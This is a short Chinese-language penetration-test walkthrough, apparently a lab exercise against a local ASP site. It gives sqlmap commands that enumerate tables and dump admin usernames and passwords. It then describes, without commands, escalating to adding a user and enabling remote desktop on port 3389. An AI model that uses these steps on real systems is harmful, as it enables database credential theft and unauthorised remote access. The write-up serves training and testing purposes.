扫描发现存在SQL注入漏洞
注入点:http://localhost/CompHonorBig.asp?id=37 可能存在sql注入漏洞
==========================================================================================
1.在sqlmap中进行注入查询
(1)
通过命令 sqlmap.py -u “http://localhost/compHonorBig.asp?id=37”--tables #查询表名
存在以下表名
(2)
猜测管理员账号密码在admin表中
通过命令 sqlmap.py -u “http://localhost/compHonorBig.asp?id=37”-D admin --columns#查询admin表中列名
(3)
继续查询管理员账号密码 sqlmap.py -u “http://localhost/compHonorBig.asp?id=37”-D admin -C username,password --dump #查询管理员账号密码
(2)
(4)
==================================================================
(2)
whoami查看发现是system权限,没有安装防护软件
直接cmd命令下添加用户
成功
可以看到3389端口是关闭的
3389是远程连接段口,开启即可远程连接
=============================================================================================
(2)
(4)
tips:一般来说能直接访问到目标就不用转发,要转发先转发到公网在连接上去
=========================其实在cmd命令下查看ip,可以看到如下===============================
mstsc直接访问 192.168.74.128
即可进入 无须lcx端口转发
其实是不需要lcx转发的,白小小说客户一定要看到lcx转发,无奈我又没有公网服务器,只好假设虚拟机连接。